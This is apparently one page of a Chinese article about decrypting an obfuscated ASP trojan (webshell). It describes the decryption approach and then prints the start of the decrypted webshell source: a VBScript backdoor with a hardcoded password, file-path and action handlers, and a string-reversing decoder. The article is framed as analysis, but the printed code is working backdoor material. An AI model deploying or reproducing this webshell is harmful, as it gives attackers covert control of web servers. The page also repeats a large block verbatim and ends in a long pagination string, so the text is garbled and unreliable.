asp木马代码解密的随机加密webshell
显示出代码。弊病我想你已经想到了,这个文件多达59个shisan加密字串。更为重要的是需要运行这个asp文件才能解密,那么在函数functon中的加密代码怎么办,大家都知道只要当调用这个函数的时候这个函数才会执行解密,那么我们怎么办,可能会有人说把上面代码放到函数中去不就行了?不行的,上面的代码放到函数中去了,那么他就成了函数的一部分,执行就会出错。
解密走到这里我们已经绕了一个大圈,仔细一想,按照shell文件的原来解密过程,自己写解密程序不是更好吗?解密函数已经放到程序中了,这样解密后代码准确,不会去纠正,只要加密shell是ok的那么解密的文件就没问题。
按照作者的解密函数,画了一个解密程序
一整剪切、复制后,这个shell就完全解密出来了。解密出来后记得重新处理特殊字符。
明文shell如下
复制代码 代码如下:
<%@ LANGUAGE = VBScript %>
<%
UserPass="111"
mName="随机加密"
SiteURL="http://www.hacker.com"
Copyright="ASP木马随机加密器"
AD="随机加密"
imgurl="<img src=''http://p7.images22.51img1.com/6000/god7girl7/7f1718b7d09d22cb0957f1ef93f8873d.gif'' width=150 height=30></img>" ''精美横条,不用图片改为<hr>
bj="#000000" ''设置背景颜色
wz="#00ff00" ''设置文字颜色
budu="#FFFFCC" ''设置按钮对话框颜色
Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next:sub ShowErr():If Err Then
RRS"<br><a href=''javascript:history.back()''><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,"\","\\"):End Function:Function RRePath(S):RRePath=Replace(S,"\\","\"):End Function:URL=Request.ServerVariables("URL"):ServerIP=Request.ServerVariables("LOCAL_ADDR"):Action=Request("Action"):RootPath=Server.MapPath("."):WWWRoot=Server.MapPath("/"):u=request.servervariables("http_host")&url:p=userpass:posurl="http":FolderPath=Request("FolderPath"):FName=Request("FName"):BackUrl="<br><br><center><a href=''javascript:history.back()''>返回</a></center& gt;":function face(Color,Siz,Var):if Siz=0 then
siz=""
else
siz=" size=''"&Siz&"''":end if:face="<FONT face=Webdings color=''#"&Color&"'' "&Siz&">"&Var&"</FONT>":End function
Function UZSS(objstr):objstr = Replace(objstr, "↙", """"):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> "∞" Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mName&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:"&bj&";color:"&wz&";}"
RRS"input,select,textarea{font-size: 12px;background-color:"&budu&";border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-
解密走到这里我们已经绕了一个大圈,仔细一想,按照shell文件的原来解密过程,自己写解密程序不是更好吗?解密函数已经放到程序中了,这样解密后代码准确,不会去纠正,只要加密shell是ok的那么解密的文件就没问题。
按照作者的解密函数,画了一个解密程序
一整剪切、复制后,这个shell就完全解密出来了。解密出来后记得重新处理特殊字符。
明文shell如下
复制代码 代码如下:
<%@ LANGUAGE = VBScript %>
<%
UserPass="111"
mName="随机加密"
SiteURL="http://www.hacker.com"
Copyright="ASP木马随机加密器"
AD="随机加密"
imgurl="<img src=''http://p7.images22.51img1.com/6000/god7girl7/7f1718b7d09d22cb0957f1ef93f8873d.gif'' width=150 height=30></img>" ''精美横条,不用图片改为<hr>
bj="#000000" ''设置背景颜色
wz="#00ff00" ''设置文字颜色
budu="#FFFFCC" ''设置按钮对话框颜色
Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next:sub ShowErr():If Err Then
RRS"<br><a href=''javascript:history.back()''><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,"\","\\"):End Function:Function RRePath(S):RRePath=Replace(S,"\\","\"):End Function:URL=Request.ServerVariables("URL"):ServerIP=Request.ServerVariables("LOCAL_ADDR"):Action=Request("Action"):RootPath=Server.MapPath("."):WWWRoot=Server.MapPath("/"):u=request.servervariables("http_host")&url:p=userpass:posurl="http":FolderPath=Request("FolderPath"):FName=Request("FName"):BackUrl="<br><br><center><a href=''javascript:history.back()''>返回</a></center& gt;":function face(Color,Siz,Var):if Siz=0 then
siz=""
else
siz=" size=''"&Siz&"''":end if:face="<FONT face=Webdings color=''#"&Color&"'' "&Siz&">"&Var&"</FONT>":End function
Function UZSS(objstr):objstr = Replace(objstr, "↙", """"):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> "∞" Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mName&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:"&bj&";color:"&wz&";}"
RRS"input,select,textarea{font-size: 12px;background-color:"&budu&";border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-
上一页123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899下一页